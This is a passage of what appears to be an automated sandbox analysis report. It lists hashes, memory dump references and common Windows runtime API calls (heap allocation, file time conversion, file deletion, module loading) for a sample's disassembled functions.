                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                                                    • Instruction ID: 5c23d59cb5a3f8bd74177d34e0005229ddf34829e311af4bf283f35e755ecf11
                                                                                                    • Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                                                    • Instruction Fuzzy Hash: 7011C161A08B8181FA208B26A404169A361FB44BF8F980375EE7D8B7EACFBCD0518740
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF692988039), ref: 00007FF6929881DF
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF692988039), ref: 00007FF6929881F5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$System$FileLocalSpecific
                                                                                                    • String ID:
                                                                                                    • API String ID: 1707611234-0
                                                                                                    • Opcode ID: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
                                                                                                    • Instruction ID: 16640f9f11f6bb117b47a8227717038e0126f95518bab3cb8a57223f6188e53d
                                                                                                    • Opcode Fuzzy Hash: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
                                                                                                    • Instruction Fuzzy Hash: A4018E2291C65586F7608B16E41123EB3A0FB81BB9F600275EAAD815E9DFBDD410CB10
                                                                                                    APIs
                                                                                                    • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF692993492,?,?,?,00007FF6929934CF,?,?,00000000,00007FF692993995,?,?,00000000,00007FF6929938C7), ref: 00007FF69298B022
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF692993492,?,?,?,00007FF6929934CF,?,?,00000000,00007FF692993995,?,?,00000000,00007FF6929938C7), ref: 00007FF69298B02C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 588628887-0
                                                                                                    • Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                                    • Instruction ID: 6dbf77fb822001bab1599a83fc6c4fa39d99d28daa39a6ec24fa4516f5546657
                                                                                                    • Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                                    • Instruction Fuzzy Hash: A0E08614F0920246FF349BB354550381391EF8475DF4844B4C81ECA257DEAC68994610
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2018770650-0
                                                                                                    • Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                                    • Instruction ID: d17d04e626f0461ba2a4edefa41978055c96a0ba1c5245e13b93c80848b15b5e
                                                                                                    • Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                                                    • Instruction Fuzzy Hash: 44D0C914E1950785F6346777185917913A1FF55B39F5406B4C02EC21D2DEACA0590161
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryErrorLastRemove
                                                                                                    • String ID:
                                                                                                    • API String ID: 377330604-0
                                                                                                    • Opcode ID: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
                                                                                                    • Instruction ID: 8fed72e2aa43369ed9c49f23aca21457d719b99e13d65a4a2789d8db8840fa97
                                                                                                    • Opcode Fuzzy Hash: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
                                                                                                    • Instruction Fuzzy Hash: C441A216E1CA8581FA319B29D5152FD2364FBA574CF44A272DF8D82193EFA8E1D8D340
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 840049012-0
                                                                                                    • Opcode ID: b5ba3a7bdd6f81a08fecbc5f0608456278931d2be0cec5afaef281c9482569b9
                                                                                                    • Instruction ID: 7bb1adcaeb617ebcfe046c6fdae2422bf01f90afd6f607b5b24b1c35440c67b5
                                                                                                    • Opcode Fuzzy Hash: b5ba3a7bdd6f81a08fecbc5f0608456278931d2be0cec5afaef281c9482569b9
                                                                                                    • Instruction Fuzzy Hash: 4421D621B0925245FA709B17A8043BAA755FF45BCCF8C5470EE0D8B787DEBDE401D240
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: a272c684b9e82b0f6d5b5ea7b632cf799a6e84b33c7975b6586671660882a7e4
                                                                                                    • Instruction ID: 5cc74a2ee8c278d52741bcbe1ce84113e17f50a820c0f8f658c05bf79cde97ee
                                                                                                    • Opcode Fuzzy Hash: a272c684b9e82b0f6d5b5ea7b632cf799a6e84b33c7975b6586671660882a7e4
                                                                                                    • Instruction Fuzzy Hash: 7A31A122A1870285FB65AF57C84177827A0EF44B99F4901B5EA1C8B3D3CEFCE8458711
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3947729631-0
                                                                                                    • Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                                                    • Instruction ID: d17f9b87bdfeb7a838159d28bdd668df3178b81a1dcec34189a6ec26a2fe9366
                                                                                                    • Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                                                    • Instruction Fuzzy Hash: C1217A72A047468EFB248F65C4402BC37A0EB0971CF58067AD62D86AC6DFB8D584CB50
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF69298BAA6,?,?,?,00007FF69298AC67,?,?,00000000,00007FF69298AF02), ref: 00007FF69298F2AD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                                                    • Instruction ID: 9d7654f6ee1d84e2693d2a44c1ef1d92c1469b287a76a58535ebd69434630d83
                                                                                                    • Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
                                                                                                    • Instruction Fuzzy Hash: C7F0901DB0960791FE7497A394613B91391DF4AB48F8C64B0CD0ECA3C3DEDCE4808691
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00007FF692980E24,?,?,?,00007FF692982336,?,?,?,?,?,00007FF692983929), ref: 00007FF69298DCFA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                                                    • Instruction ID: 42d66207ab999c9afd7843d2a678339b4d9db0dd1f498d79eb03012fcdfd5b43
                                                                                                    • Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
                                                                                                    • Instruction Fuzzy Hash: 87F0FE14B092465AFE74667398516755390DF957ACF0C46B0DD2ECD6C3EEDCE840C560